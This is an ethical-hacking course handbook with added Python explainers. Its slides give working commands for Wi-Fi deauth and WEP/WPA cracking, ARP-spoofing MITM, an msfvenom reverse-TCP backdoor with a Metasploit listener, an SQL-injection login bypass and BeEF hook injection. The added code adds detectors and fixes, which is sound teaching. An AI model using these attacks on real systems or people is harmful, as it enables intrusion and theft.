ATIL SAMANCIOGLU

ETHICAL HACKING
HACKER’S HANDBOOK
COURSE CONTENT

▸ Introduction

▸ What is Ethical Hacking?

▸ What are we going to learn?

▸ Before we start
COURSE CONTENT

▸ Setup

▸ What is Virtual Machine and why?

▸ Setting Up Virtual Box

▸ What is Kali Linux?

▸ Setting Up Windows 10 as VM

▸ Snapshots
COURSE CONTENT

▸ Kali Linux

▸ Kali Linux Overview

▸ Linux Commands

▸ Changing Kali Password


COURSE CONTENT

▸ Be Anonymous On Web

▸ How Do Networks Work?

▸ VPN & DNS

▸ Changing DNS Servers

▸ Using VPN Books

▸ Practical Usage of VPN


COURSE CONTENT

▸ Dark Web

▸ What is Dark Web?

▸ Tor Browser

▸ Browsing Dark Web


COURSE CONTENT

▸ Network Penetration Testing

▸ What is Network Penetration?

▸ Choosing a Wi-Fi card

▸ Setting up a Wi-Fi card

▸ What is a MAC address?

▸ Monitor Mode vs Managed Mode

COURSE CONTENT

▸ Pre-Network Penetration

▸ Packet Sniffing (Airodump-ng)

▸ Targeted Packet Sniffing

▸ Deauth Attacks

▸ Fake Access Points

COURSE CONTENT
▸ Network Penetration Testing

▸ What is WEP and how do we crack it?

▸ WEP Cracking Executions

▸ WEP Cracking - Fake Auth

▸ WEP Cracking ARP Request Replay

▸ What is WPA and how do we crack it?

▸ WPA Cracking - Handshakes

▸ WPA Cracking - Wordlist

▸ How to protect yourself?


COURSE CONTENT
▸ Post-Network Penetration

▸ Post Connection Settings

▸ Using netdiscover

▸ Infamous framework: nmap

▸ Man In The Middle

▸ Manual Arp Poisoning

▸ MITM Framework

▸ Using SSLStrip

▸ What is HSTS?

▸ Messing with DNS

▸ Taking screenshot of target

▸ Injecting keylogger to target

▸ Injecting Javascript codes

▸ Wireshark Setup

▸ Wireshark analysis

▸ How to secure yourself from MITM?


COURSE CONTENT
▸ Attacking Computers

▸ Metasploitable 2 VM

▸ How to gather basic information?

▸ Using basic exploits

▸ Code executions

▸ MSFC setup (Metasploit community)

▸ MSFC scan

▸ MSFC analysis
COURSE CONTENT
▸ Attacking Users

▸ What is Veil?

▸ Veil overview

▸ Creating Trojans

▸ Listening for incoming sessions

▸ How to deliver trojans

▸ Bdfproxy configuration

▸ Injecting trojans into downloads

COURSE CONTENT
▸ Attacking Users - Social Engineering

▸ How to use Maltego?

▸ Targeting

▸ Creating an attack strategy

▸ Coupling trojans with different files

▸ Brand new trojan

▸ Trojan pretending to be a .jpg

▸ E-mail forgery
COURSE CONTENT
▸ Attacking Users - Beef

▸ What is Beef?

▸ Hooking with Mitmf

▸ Attacking targets

▸ Stealing Facebook, Youtube passwords

▸ Taking over control

▸ How to protect yourself?


COURSE CONTENT

▸ Setting Up Your Router

▸ Network Settings

▸ Outside Backdoor

▸ Hacking In
COURSE CONTENT

▸ Post Hacking

▸ Meterpreter Sessions

▸ Migration

▸ Downloading Sensitive Files

▸ Capturing The Keylogs

▸ Sustain The Session


COURSE CONTENT
▸ Website Pentesting - Info Gathering

▸ Website Pentesting Setup

▸ Maltego Again!

▸ Netcraft

▸ Reverse IP

▸ Whois Lookup

▸ Robots

▸ Subdomains
COURSE CONTENT

▸ Website Pentesting

▸ Code Execution Vulnerability

▸ Reverse TCP Commands

▸ File Upload Exploit

▸ File Inclusion
COURSE CONTENT

▸ Hacking Websites with XSS

▸ What is XSS?

▸ Reflected XSS

▸ Stored XSS

▸ Real Time Hacking with XSS

▸ How to Protect Yourself?

COURSE CONTENT

▸ Databases & SQL

▸ What is SQL?

▸ Android Studio Example

▸ Writing Values to Database

▸ Retrieving Values From Database

▸ Deleting and Updating Data


COURSE CONTENT
▸ SQL Injection

▸ Databases in Metasploitable

▸ Mutillidae Database

▸ Testing Vulnerabilities

▸ Post Method SQLi

▸ Retrieving Admin Pass

▸ Stealing Every Password On Database

▸ Learning Database Name

▸ Digging Deeper

▸ Retrieving Everything
COURSE CONTENT

▸ Website Pentesting Tools

▸ Sqlmap

▸ Zap

▸ Zap Analysis
WHAT TO LEARN?
▸ Before hacking into the computer

▸ VPN - Deep Web

▸ Network Pentesting

▸ Hacking into the computer

▸ Attacks on computers

▸ Attacks on users

▸ After hacking into the computer

▸ Meterpreter etc.

▸ Website hacking

▸ Code vulnerabilities

▸ SQL Injection

▸ XSS
VIRTUAL MACHINE
IP - DNS - VPN
[Diagram: three LAN hosts (192.168.0.10, 192.168.0.11, 192.168.0.12) send requests to the router at 192.168.0.1, which forwards them to the Internet from its public IP 85.100.25.149; responses come back over the same path, so outside services only ever see the router's address.]
DARK WEB
[Diagram: the visible web on top, the deep web beneath it, and the dark web at the bottom, reached through Tor or Freenet.]
NETWORK PENETRATION
▸ Pre - Network Connection

▸ Connecting to Network: Wi-Fi hacking

▸ Post - Network Connection

MAC ADDRESS
▸ ifconfig <interface> down

▸ macchanger -m <mac> <interface>

▸ ifconfig <interface> up
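Added example (not from the handbook): what the macchanger step above needs from the address you hand it. The code validates a MAC, shows the two bits of the first octet that decide whether a driver will accept it (multicast and locally-administered), generates a random address the way macchanger -r / -e would, and builds the three command lines from the slide. The interface name wlan0 and every MAC value are assumptions; nothing is executed against a real interface.

```python
# Added example, not from the handbook: what `macchanger -m <mac> <interface>`
# needs from the address you give it. Interface name and sample MACs are made up;
# nothing here touches a real interface, it only validates and builds the commands.
import os
import re
from typing import List, Optional

MAC_RE = re.compile(r"^([0-9a-f]{2}:){5}[0-9a-f]{2}$")


def parse_mac(mac: str) -> bytes:
    """Accept aa:bb:cc:dd:ee:ff or aa-bb-cc-dd-ee-ff and return the 6 raw bytes."""
    mac = mac.lower().replace("-", ":")
    if not MAC_RE.match(mac):
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return bytes(int(octet, 16) for octet in mac.split(":"))


def fmt_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def is_unicast(raw: bytes) -> bool:
    # Bit 0 of the first octet: 0 = unicast, 1 = multicast/broadcast.
    return raw[0] & 0x01 == 0


def is_locally_administered(raw: bytes) -> bool:
    # Bit 1 of the first octet: 1 = locally administered (not a registered vendor OUI).
    return raw[0] & 0x02 != 0


def random_mac(keep_oui_from: Optional[str] = None) -> str:
    """Generate a MAC a driver will accept.

    Default: fully random (like macchanger -r) with the U/L bit set and the
    multicast bit cleared, so it is a valid unicast address that can never collide
    with a registered vendor prefix.
    With keep_oui_from: keep that address's first three octets (like macchanger -e)
    so the new MAC still looks like the same vendor; only the device half changes.
    """
    raw = bytearray(os.urandom(6))
    if keep_oui_from is None:
        raw[0] = (raw[0] | 0x02) & 0xFE   # set locally-administered, clear multicast
    else:
        raw[:3] = parse_mac(keep_oui_from)[:3]
    return fmt_mac(bytes(raw))


def macchanger_commands(interface: str, new_mac: str) -> List[str]:
    """The three commands from the slide, with the MAC checked before anything runs."""
    raw = parse_mac(new_mac)
    if not is_unicast(raw):
        raise ValueError("multicast bit set; a NIC cannot use this as its own address")
    return [
        f"ifconfig {interface} down",                  # the interface must be down to change it
        f"macchanger -m {fmt_mac(raw)} {interface}",
        f"ifconfig {interface} up",
    ]


if __name__ == "__main__":
    spoof = random_mac()
    for cmd in macchanger_commands("wlan0", spoof):   # "wlan0" is an assumed interface name
        print(cmd)
```

The shortened four-octet MACs used as placeholders on the following slides fail parse_mac on purpose: a real address is always six octets.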
MONITOR VS MANAGED
AIRODUMP-NG

▸ airmon-ng start <interface> (monitor mode; the monitor interface it creates, mon0 on these slides, is what the later commands use)

▸ airodump-ng <interface>

▸ Ctrl+C to stop
AIRODUMP-NG

▸ airodump-ng --channel <channel> --bssid <bssid> --write <file_name> <interface>

▸ ex: airodump-ng --channel 12 --bssid 40:30:20:10 --write test mon0

▸ the MACs on these slides are shortened placeholders; a real BSSID or client MAC has six colon-separated octets
DEAUTHENTICATION ATTACK

▸ aireplay-ng --deauth <#packets> -a <AP> <interface>

▸ ex: aireplay-ng --deauth 1000 -a 10:20:30:40 mon0

▸ aireplay-ng --deauth <#packets> -a <AP> -c <target> <interface>

▸ ex: aireplay-ng --deauth 1000 -a 10:20:30:40 -c 00:AA:11:BB mon0

▸ without -c the deauth frames are broadcast to every client of the AP; 0 as <#packets> keeps sending until you stop it
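Added example (not from the handbook): the 802.11 frame aireplay-ng transmits for the deauth commands above, built byte by byte, and the counting rule a monitor-mode sensor uses to tell an attack from a normal deauthentication. Every frame is constructed inside the file and the AP and client MACs are made up; the frame layout and reason code 7 are the real ones.

```python
# Added example, not from the handbook: the 802.11 frame `aireplay-ng --deauth`
# transmits, and the counting rule a monitor-mode sensor uses to spot the flood.
# All frames are constructed in this file; the AP and client MACs are made up.
import struct
from collections import Counter
from typing import Dict, Iterable, Tuple

BROADCAST = "ff:ff:ff:ff:ff:ff"
FC_DEAUTH = 0x00C0   # frame control: type 0 (management), subtype 12 (deauthentication)
FC_BEACON = 0x0080   # type 0, subtype 8 (beacon); used as the benign traffic below
REASON_CLASS3_FRAME_FROM_NONASSOC_STA = 7   # reason code aireplay-ng puts in its deauths


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mgmt_header(fc: int, receiver: str, transmitter: str, bssid: str, seq: int) -> bytes:
    # 24-byte management header: FC, duration, addr1 (RA), addr2 (TA), addr3 (BSSID), seq ctrl.
    return (struct.pack("<H", fc) + b"\x00\x00"
            + mac_bytes(receiver) + mac_bytes(transmitter) + mac_bytes(bssid)
            + struct.pack("<H", (seq & 0xFFF) << 4))   # fragment 0, 12-bit sequence number


def deauth_frame(ap: str, client: str = BROADCAST, seq: int = 0) -> bytes:
    """What `aireplay-ng --deauth N -a <AP> [-c <client>]` sends, N times.

    The transmitter address is the AP's (spoofed); without -c the receiver is
    broadcast so every station in the cell drops its association at once.
    The body is just the 2-byte reason code."""
    return mgmt_header(FC_DEAUTH, client, ap, ap, seq) + struct.pack(
        "<H", REASON_CLASS3_FRAME_FROM_NONASSOC_STA)


def beacon_frame(ap: str, seq: int = 0) -> bytes:
    # Beacon body omitted: the detector only reads the header.
    return mgmt_header(FC_BEACON, BROADCAST, ap, ap, seq)


def parse_mgmt(frame: bytes) -> dict:
    fc, = struct.unpack_from("<H", frame, 0)
    info = {
        "type": (fc >> 2) & 0x3,
        "subtype": (fc >> 4) & 0xF,
        "receiver": frame[4:10].hex(":"),
        "transmitter": frame[10:16].hex(":"),
        "bssid": frame[16:22].hex(":"),
    }
    if info["type"] == 0 and info["subtype"] == 12:
        info["reason"], = struct.unpack_from("<H", frame, 24)
    return info


def detect_deauth_flood(frames: Iterable[bytes], threshold: int = 10) -> Dict[Tuple[str, str], int]:
    """Count deauthentication frames per (transmitter, receiver) pair in one capture
    window. A legitimate AP deauths a client once; tens of deauths to broadcast
    with reason 7 inside a second is the aireplay-ng signature."""
    counts: Counter = Counter()
    for raw in frames:
        p = parse_mgmt(raw)
        if p["type"] == 0 and p["subtype"] == 12:
            counts[(p["transmitter"], p["receiver"])] += 1
    return {pair: n for pair, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    AP = "10:20:30:40:50:60"                                   # made-up BSSID
    capture = [beacon_frame(AP, i) for i in range(5)]          # normal traffic
    capture += [deauth_frame(AP, seq=i) for i in range(64)]    # aireplay-ng --deauth 64 -a AP
    print(detect_deauth_flood(capture))
```

Because management frames are unauthenticated in WPA/WPA2 without 802.11w, the only defence on the AP side is enabling Protected Management Frames; on the monitoring side, the per-pair count above is what tools like Kismet alert on.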
ENCRYPTION
▸ WEP

▸ WPA / WPA2
WEP
[Diagram: for every frame the sender combines the shared KEY (PASSWORD) with a per-frame INITIALIZATION VECTOR (IV); the IV travels in the clear in front of the encrypted data, and request/response traffic flows through the router to the Internet as in the earlier network diagram.]
WEP CRACKING

▸ airodump-ng --channel <channel> --bssid <bssid> --write <file_name> <interface>

▸ ex: airodump-ng --channel 10 --bssid 10:20:30:40 --write test mon0

▸ aircrack-ng <file_name>

▸ ex: aircrack-ng test-01.cap (airodump-ng numbers its output files, so --write test produces test-01.cap)

▸ aircrack-ng needs tens of thousands of unique IVs (the #Data column in airodump-ng) to recover a WEP key; the next two slides are about collecting them faster

WEP CRACKING - FAKE AUTH

▸ aireplay-ng --fakeauth 0 -a <target_MAC> -h <kali_MAC> <interface>

▸ ex: aireplay-ng --fakeauth 0 -a 10:20:30:40 -h 50:AA:BB:40 mon0

▸ fake authentication associates our card with the AP so it accepts the packets we inject; 0 authenticates once, a positive number re-authenticates every that many seconds
WEP CRACKING - PACKET INJECTION

▸ aireplay-ng --arpreplay -b <target_MAC> -h <kali_MAC> <interface>

▸ ex: aireplay-ng --arpreplay -b 10:20:30:40 -h 00:aa:bb:33 mon0

▸ --arpreplay (or -3) captures an ARP request and replays it; the AP answers every copy with a freshly encrypted frame, so the IV count climbs in minutes instead of hours
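Added example (not from the handbook): why airodump-ng counts IVs and why replaying ARP requests shortens a WEP crack. RC4 and the IV-prefixed key are WEP's real construction; the key, IVs and plaintexts are made-up test values. What the code shows is the keystream-reuse weakness behind the 24-bit IV, not the exact statistical (PTW) attack aircrack-ng runs to recover the key itself.

```python
# Added example, not from the handbook: why airodump-ng reports an IV count for a
# WEP network and why ARP-request replay speeds the crack up. RC4 and the
# IV||key framing are WEP's real construction; the key, IVs and plaintexts are
# made-up test values. This shows the keystream-reuse weakness, not the exact
# statistical (PTW) attack aircrack-ng runs, which recovers the key itself.
import math


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling, then data XOR the generated keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: the 24-bit IV in the clear, then RC4(IV || key) XOR plaintext.
    (Real WEP also appends a CRC-32 ICV before encrypting; omitted here, it does
    not change the weakness shown.)"""
    if len(iv) != 3:
        raise ValueError("WEP IV is exactly 24 bits")
    return iv + rc4(iv + key, plaintext)


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    iv, ciphertext = frame[:3], frame[3:]
    return rc4(iv + key, ciphertext)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def decrypt_via_iv_reuse(known_frame: bytes, known_plaintext: bytes, other_frame: bytes) -> bytes:
    """Two frames encrypted under the same IV share a keystream. Knowing one
    plaintext (an ARP request has a fixed size and a predictable header, which is
    why aireplay-ng replays them) recovers the keystream and decrypts the other
    frame without ever learning the key."""
    if known_frame[:3] != other_frame[:3]:
        raise ValueError("frames use different IVs; no keystream reuse")
    keystream = xor(known_frame[3:], known_plaintext)
    return xor(other_frame[3:], keystream)


def frames_until_iv_collision(iv_bits: int = 24) -> int:
    """Birthday bound: about sqrt(pi/2 * 2^24), a few thousand frames, before some IV
    repeats. A busy AP, or ARP replay, reaches that in minutes."""
    return int(math.sqrt(math.pi / 2 * 2 ** iv_bits))


if __name__ == "__main__":
    key = bytes.fromhex("0102030405")                 # made-up 40-bit WEP key
    iv = b"\x00\x11\x22"
    arp = b"ARP request: who-has 192.168.1.1"        # stands in for a known ARP frame
    secret = b"secret payload in another frame"
    f1, f2 = wep_encrypt(key, iv, arp), wep_encrypt(key, iv, secret)
    print(decrypt_via_iv_reuse(f1, arp, f2))
    print("frames until some IV repeats:", frames_until_iv_collision())
```

Every replayed ARP request forces the AP to emit a fresh IV, so airodump-ng's #Data counter climbs towards the tens of thousands of distinct IVs aircrack-ng needs.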
WPA CRACKING

▸ Handshake

▸ Wordlist
WPA/WPA2

▸ airodump-ng --channel <channel> --bssid <bssid> --write <file_name> <interface>

▸ ex: airodump-ng --channel 10 --bssid 10:20:30:40 --write test mon0

▸ aireplay-ng --deauth <#packets> -a <AP> -c <target> <interface>

▸ ex: aireplay-ng --deauth 1000 -a 10:20:30:40 -c aa:bb:30:40 mon0

▸ the deauth forces the client to reconnect, so airodump-ng captures the 4-way handshake (it shows "WPA handshake:" in its top right corner)
CRUNCH

▸ crunch <min> <max> <charset> -t <pattern> -o <file>

▸ ex: crunch 5 5 123!'^+% -t m@@@p -o wordlist

▸ with -t, <min> and <max> must equal the pattern length (crunch refuses 8 10 for the 5-character pattern m@@@p); each @ is replaced by every character of <charset> in turn, the other characters stay fixed

▸ WPA/WPA2 passphrases are 8 to 63 characters, so a pattern shorter than 8 only produces candidates aircrack-ng will skip
WPA/WPA2 WORDLIST

▸ aircrack-ng <handshake_file> -w <wordlist>

▸ ex: aircrack-ng test-01.cap -w wordlist

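Added example (not from the handbook) covering the CRUNCH and WPA/WPA2 WORDLIST slides together: what aircrack-ng computes for each candidate passphrase when given a handshake and a wordlist, with a crunch-style -t pattern generator to produce that wordlist. PBKDF2 to PMK, PRF-512 to PTK and HMAC-SHA1 to MIC are the IEEE 802.11i (WPA2-CCMP) derivations; the SSID, MACs, nonces and EAPOL bytes are constructed test values standing in for a real test-01.cap, and both ends of the handshake are simulated to produce the MIC that then gets cracked.

```python
# Added example, not from the handbook: what `aircrack-ng <handshake> -w <wordlist>`
# computes per candidate, plus a crunch-style "-t" pattern generator for the
# wordlist. PBKDF2 -> PMK, PRF-512 -> PTK and HMAC-SHA1 -> MIC are the IEEE 802.11i
# (WPA2-CCMP) derivations; the SSID, MACs, nonces and EAPOL bytes are constructed
# test values standing in for a real test-01.cap capture, and both sides of the
# handshake are simulated here to produce the MIC that gets cracked.
import hashlib
import hmac
import itertools
from typing import Iterable, Iterator, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # 4096 iterations of PBKDF2-HMAC-SHA1 is why WPA cracking is slow per candidate.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    # 802.11i PRF: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, concatenated.
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # MACs and nonces are ordered by value so both sides derive the same PTK.
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    # WPA2 (AKM 00-0F-AC:2): HMAC-SHA1 over the EAPOL-Key frame with its MIC field
    # zeroed, truncated to 16 bytes. WPA1/TKIP uses HMAC-MD5 instead.
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes,
                    eapol_mic_zeroed: bytes, captured_mic: bytes,
                    wordlist: Iterable[str]) -> Optional[str]:
    """Per candidate: passphrase -> PMK -> PTK -> KCK (first 16 bytes) -> MIC, compared
    with the MIC captured in message 2 (or 4) of the 4-way handshake."""
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:   # outside WPA's passphrase length; aircrack-ng skips these too
            continue
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_mic_zeroed), captured_mic):
            return candidate
    return None


def crunch_pattern(pattern: str, charset: str) -> Iterator[str]:
    """crunch -t as used on the slide: every '@' takes each charset character in turn,
    literal characters stay fixed, output length equals the pattern length."""
    slots = [i for i, ch in enumerate(pattern) if ch == "@"]
    for combo in itertools.product(charset, repeat=len(slots)):
        chars = list(pattern)
        for i, ch in zip(slots, combo):
            chars[i] = ch
        yield "".join(chars)


if __name__ == "__main__":
    # Constructed "capture": an AP and a station finishing a handshake with a known passphrase.
    ssid, secret = "TestNet", "pass2301"
    ap, sta = bytes.fromhex("102030405060"), bytes.fromhex("00aa11bb22cc")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    eapol = bytes.fromhex("0203007502010a00") + b"\x00" * 113   # EAPOL-Key msg 2 skeleton, MIC zeroed
    mic = eapol_mic(derive_ptk(pmk_from_passphrase(secret, ssid), ap, sta, anonce, snonce)[:16], eapol)
    print(crack_handshake(ssid, ap, sta, anonce, snonce, eapol, mic,
                          crunch_pattern("pass@@@1", "0123")))
```

The PBKDF2 step is the whole cost: a GPU cracker is faster only because it runs that step in parallel, which is why a long, non-pattern passphrase is still the protection the "How to protect yourself?" slide asks for.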
DISCOVER

▸ netdiscover -i <interface> -r <range>

▸ ex: netdiscover -i wlan0 -r 192.168.1.0/24

▸ nmap <target> (port and service scan of the hosts netdiscover found)
PORTS

Port #          Protocol
20/21           FTP
22              SSH
23              Telnet
25              SMTP
53              DNS
67/68           DHCP
69              TFTP
80              HTTP
110             POP3
123             NTP
137/138/139     NetBIOS
143             IMAP
161/162         SNMP
179             BGP
389             LDAP
443             HTTPS
636             LDAPS
989/990         FTPS (FTP over SSL/TLS)
MITM
[Diagram 1: normal traffic, requests and responses pass directly between the client and the ROUTER.]
[Diagram 2: after ARP poisoning the HACKER sits between the two; every request and response is relayed through the hacker's machine, which can read or modify it.]
MITM

▸ arpspoof -i <interface> -t <target_IP> <AP_IP> (tells the target that our MAC belongs to the gateway)

▸ arpspoof -i <interface> -t <AP_IP> <target_IP> (tells the gateway that our MAC belongs to the target; both directions are needed to see the replies too)

▸ echo 1 > /proc/sys/net/ipv4/ip_forward (forward the intercepted traffic on; without it the target loses its connection and the attack is obvious)

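Added example (not from the handbook): the frame arpspoof keeps repeating for the two commands above, built byte by byte, and the check that catches it on the defending side: an IP whose MAC changes mid-session, which is the rule arpwatch and switch-side dynamic ARP inspection apply. All addresses are assumed lab values and every frame is built in memory.

```python
# Added example, not from the handbook: the frame `arpspoof -t <target> <gateway>`
# repeats every couple of seconds, and the check that catches it: an IP whose MAC
# changes mid-session (the rule arpwatch and switch "dynamic ARP inspection" apply).
# All addresses are made up and all frames are built in memory.
import socket
import struct
from typing import Dict, List, Optional

ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def arp_reply(sender_ip: str, sender_mac: str, target_ip: str, target_mac: str) -> bytes:
    """Ethernet II + ARP 'is-at' reply (42 bytes). arpspoof fills sender_ip with the
    gateway's address and sender_mac with the attacker's, so the target's ARP cache
    maps gateway IP -> attacker MAC and routes its traffic through the attacker."""
    ethernet = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)  # htype Ethernet, ptype IPv4, hlen, plen, opcode
    arp += mac_bytes(sender_mac) + socket.inet_aton(sender_ip)
    arp += mac_bytes(target_mac) + socket.inet_aton(target_ip)
    return ethernet + arp


def parse_arp(frame: bytes) -> Optional[dict]:
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    _htype, _ptype, _hlen, _plen, opcode = struct.unpack("!HHBBH", frame[14:22])
    return {
        "opcode": opcode,
        "sender_mac": frame[22:28].hex(":"),
        "sender_ip": socket.inet_ntoa(frame[28:32]),
        "target_mac": frame[32:38].hex(":"),
        "target_ip": socket.inet_ntoa(frame[38:42]),
    }


class ArpWatch:
    """Pins the first MAC seen for each IP; any later frame claiming that IP from a
    different MAC raises an alert. Seed the table from a known-good inventory (or
    static ARP entries on critical hosts) rather than trusting the first packet."""

    def __init__(self, known: Optional[Dict[str, str]] = None):
        self.table: Dict[str, str] = dict(known or {})
        self.alerts: List[str] = []

    def observe(self, frame: bytes) -> Optional[str]:
        arp = parse_arp(frame)
        if arp is None:
            return None
        pinned = self.table.setdefault(arp["sender_ip"], arp["sender_mac"])
        if pinned != arp["sender_mac"]:
            alert = f"{arp['sender_ip']} changed from {pinned} to {arp['sender_mac']} (ARP spoofing?)"
            self.alerts.append(alert)
            return alert
        return None


if __name__ == "__main__":
    GATEWAY, VICTIM = "10.0.2.1", "10.0.2.4"                        # assumed lab addresses
    GW_MAC, VICTIM_MAC, KALI_MAC = "52:54:00:12:35:00", "08:00:27:aa:bb:cc", "08:00:27:de:ad:00"
    watch = ArpWatch()
    watch.observe(arp_reply(GATEWAY, GW_MAC, VICTIM, VICTIM_MAC))          # genuine reply from the router
    print(watch.observe(arp_reply(GATEWAY, KALI_MAC, VICTIM, VICTIM_MAC)))  # arpspoof -t 10.0.2.4 10.0.2.1
```

Seeding ArpWatch with the gateway's real MAC is the practical form of "How to secure yourself from MITM?": a static ARP entry for the gateway on the client makes the spoofed reply above ineffective, and the alert still tells you someone tried.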
GAIN ACCESS
▸ Attacking Computers

▸ Attacking Users
METASPLOIT

▸ msfconsole

▸ show

▸ use

▸ set

▸ exploit
METASPLOIT

▸ download Metasploit Community from the web

▸ cd Downloads

▸ ls

▸ chmod +x metasploit-latest-linux-x64-installer.run

▸ ./metasploit-latest-linux-x64-installer.run

▸ https://localhost:3790/ (the web interface the installer starts)
ATTACKING USERS

▸ Working with backdoors and trojans

▸ Almost always requires interaction from the user

▸ Social Engineering
ATTACKING USERS

▸ msfvenom --list payloads

▸ windows/meterpreter/reverse_tcp

▸ payload platform / payload type / payload protocol


ATTACKING USERS

▸ platform:

▸ windows

▸ linux

▸ osx

▸ android

▸ apple_ios

▸ python, java, generic …


ATTACKING USERS

▸ type:

▸ shell

▸ meterpreter

▸ dllinject, peinject, vncinject …

▸ exec, messagebox …
ATTACKING USERS

▸ protocol:

▸ reverse vs bind

▸ http, https, tcp, udp

▸ reverse_tcp

▸ bind_http
ATTACKING USERS

▸ msfvenom --payload windows/meterpreter/reverse_tcp --list-options

▸ msfvenom --payload windows/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=8080 --format exe --out mybackdoor.exe
ATTACKING USERS

▸ msfconsole

▸ use exploit/multi/handler

▸ show options

▸ show payloads

▸ set PAYLOAD windows/meterpreter/reverse_tcp

▸ set LHOST 10.0.2.15

▸ set LPORT 8080

▸ exploit -j -z
METERPRETER

▸ background

▸ sessions -l

▸ migrate

▸ sessions -i

▸ sysinfo

▸ ipconfig
DATABASE & SQL
SQL

▸ select * from accounts

▸ select * from accounts where username = 'james' and password = '654321'

▸ select * from accounts where username = 'admin' #

▸ in MySQL everything after # is a comment, so typing admin' # as the username comments out the password check and the query returns the admin row

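Added example (not from the handbook): the login query from the slide built the vulnerable way and the safe way, against an in-memory SQLite copy of an accounts table, plus the UNION trick behind "Stealing Every Password On Database". The rows, the admin password and the injected strings are constructed. One difference from the slide: Mutillidae's MySQL ends a comment with #, SQLite (used here so the code runs anywhere) uses --; the attack is otherwise identical.

```python
# Added example, not from the handbook: the slide's login query built the vulnerable
# way and the safe way, against an in-memory SQLite copy of an "accounts" table.
# Rows, the admin password and the union payload are constructed. One difference
# from the slide: Mutillidae's MySQL ends a comment with '#', SQLite uses '--';
# the attack is otherwise identical.
import sqlite3
from typing import List, Optional, Tuple

Row = Tuple[str, str, int]


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("create table accounts (username text, password text, is_admin int)")
    db.executemany("insert into accounts values (?, ?, ?)",
                   [("admin", "S3cret!pw", 1), ("james", "654321", 0)])   # constructed rows
    return db


def login_vulnerable(db: sqlite3.Connection, username: str, password: str) -> Optional[Row]:
    # String concatenation: whatever the user types becomes part of the SQL text.
    query = (f"select * from accounts where username = '{username}' "
             f"and password = '{password}'")
    return db.execute(query).fetchone()


def login_safe(db: sqlite3.Connection, username: str, password: str) -> Optional[Row]:
    # Parameterised query: the driver sends the values separately, so quotes and
    # comment markers in the input can never change the statement's structure.
    query = "select * from accounts where username = ? and password = ?"
    return db.execute(query, (username, password)).fetchone()


def search_users_vulnerable(db: sqlite3.Connection, fragment: str) -> List[str]:
    # The "stealing every password" case: a UNION appended through a search box adds
    # a second SELECT whose rows come back in the same result column.
    query = f"select username from accounts where username like '%{fragment}%'"
    return [row[0] for row in db.execute(query).fetchall()]


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "admin' --", "anything"))   # password check commented out
    print(login_safe(db, "admin' --", "anything"))         # None: the quote is just data
    print(search_users_vulnerable(db, "' union select password from accounts --"))
```

The parameterised form is the whole fix: sqlmap and ZAP in the later slides find the concatenated version because the quote in their probe changes the query's structure, and cannot find the parameterised one because it never does.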
BEEF INJECTION MITMF

▸ python mitmf.py --arp --spoof --gateway 10.0.2.1 --target 10.0.2.4 -i eth0 --inject --js-url http://10.0.2.8:3000/hook.js
